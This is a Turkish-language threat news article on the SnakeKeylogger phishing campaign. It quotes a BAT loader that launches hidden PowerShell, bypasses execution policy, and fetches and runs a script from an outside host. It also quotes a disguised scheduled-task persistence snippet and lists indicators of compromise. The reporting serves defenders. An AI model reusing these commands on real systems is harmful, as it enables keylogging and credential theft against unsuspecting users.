Son zamanlardaki hedefli kampanya dalgasından ortaya çıkan, Snakecylog’lar PowerShell ve sosyal mühendislikten yararlanan güçlü bir bilgi hırsızı olarak ortaya çıktı.
Kötü amaçlı yazılımın operatörleri, saygın finans ve araştırma firmalarının kimliğine bürünerek “CPA-Ödeme Dosyaları” gibi takma adlar altında ikna edici hedef odaklı kimlik avı e-postaları hazırlıyor.
Alıcılar, görünüşte zararsız bir BAT komut dosyası içeren ISO veya ZIP ekleriyle karşılaşır. Bu betik yürütüldükten sonra verileri uzak bir sunucuya aktarmadan önce tuş vuruşlarını ve sistem bilgilerini toplamak için tasarlanmış bir PowerShell yükünü indirir ve başlatır.
Gen Threat Labs analistleri, kötü amaçlı yazılımın meşru Windows yardımcı programları ile gizlilik ve hızlı dağıtım için özel komut dosyalarının kusursuz bir karışımına dikkat çekti.
Kurbanlar, eki açtıktan sonra farkında olmadan aşağıdaki parçaya benzeyen bir BAT dosyasını etkinleştirir:
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {iwr hxxp://fxa.sabitaxt.com/mc55tP.ps1 -OutFile %TEMP%\snake.ps1; Start-Process powershell -ArgumentList '-NoP -NonI -W Hidden -Exec Bypass -File %TEMP%\snake.ps1'}"Bu yaklaşım, standart yürütme politikalarını atlar ve görünür pencereleri gizleyerek SnakeKeylogger’ın şüphe yaratmadan çalışmasına olanak tanır.
PowerShell betiği yüklendikten sonra, zamanlanmış görevler ve kayıt defteri girişleri oluşturarak kalıcılık sağlar, kötü amaçlı yazılımın yeniden başlatmalarda hayatta kalmasını sağlar ve gelişigüzel olay müdahale çabalarından kaçınır.
İlk teslimatın ötesinde SnakeKeylogger’ın etkisi, minimalist ama etkili veri toplama rutinlerinde yatmaktadır. Etkinleştirme sonrasında komut dosyası, tuş vuruşlarını, pano içeriklerini ve etkin pencere başlıklarını yakalamak için Windows API işlevlerini çağırır.
Toplanan bilgiler bir komuta ve kontrol sunucusuna iletilmeden önce toplu hale getiriliyor ve kodlanıyor.
Gözlemlenen IoC’ler BAT yükü SHA256 karmalarını içerir: 3796e68... ve PowerShell betiği URL’si hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1, devam eden kampanyanın göstergesi.
Enfeksiyon Mekanizması
SnakeKeylogger’ın enfeksiyon zinciri iki aşamalı yükleyicisine bağlıdır. İlk BAT betiği, çekirdek keylogger modülünü almak için PowerShell’in sınırsız yürütülmesinden yararlanır.
PowerShell yükü içinde, Add-Type cmdlet, C# kodunu anında derler ve aşağıdaki gibi işlevleri enjekte eder: GetAsyncKeyState düşük seviyeli tuş vuruşu müdahalesi için.
Kalıcılık, aşağıdakilere benzeyen zamanlanmış bir görev girişi yoluyla sağlanır: –
$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -File C:\Windows\Temp\snake.ps1'
Register-ScheduledTask -TaskName 'SystemUpdate' -Action $Action -Trigger (New-ScheduledTaskTrigger -AtLogon) -RunLevel HighestBu taktik yalnızca keylogger’ı her kullanıcı oturum açtığında yeniden etkinleştirmekle kalmaz, aynı zamanda yasal Windows bakım süreçlerine de karışarak algılamayı zorlaştırır. Bu gelişen tehdide karşı koymak için sürekli izleme ve uç nokta koruma politikalarının zamanında güncellenmesi önerilir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
